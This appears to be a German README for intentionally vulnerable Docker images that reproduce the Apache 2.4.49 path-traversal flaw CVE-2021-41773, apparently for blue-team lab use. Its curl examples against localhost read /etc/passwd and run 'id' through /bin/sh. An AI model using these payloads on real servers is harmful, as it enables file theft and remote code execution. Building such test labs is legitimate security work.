
Angreifbare Docker-Images für CVE-2021-41773
Diese Schwachstelle gilt nur für Version 2.4.49, die bestimmte nicht-standardmäßige Konfigurationen haben. In bestimmten Situationen kann dies entweder zu Dateiauslese oder Codeausführung führen.
https://twitter.com/ptswarm/status/1445376079548624899
Container können direkt von Docker Hub gezogen werden mit
docker pull blueteamsteve/cve-2021-41773:no-cgid
und ausgeführt werden mit
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
Die Apache-Logs können wie unten gezeigt eingesehen werden, oder lassen Sie einfach "-dit" aus dem obigen Befehl weg, um stdio zu streamen
docker logs <container-id>
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
Container können direkt von Docker Hub gezogen werden mit
docker pull blueteamsteve/cve-2021-41773:with-cgid
und ausgeführt werden mit
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
Die Apache-Logs können wie unten gezeigt eingesehen werden, oder lassen Sie einfach "-dit" aus dem obigen Befehl weg, um stdio zu streamen
docker logs <container-id>
curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
Ändern und erstellen Sie Ihre eigenen Versionen mit der Dockerfile und den Vorlagen-httpd.conf-Dateien in den Unterverzeichnissen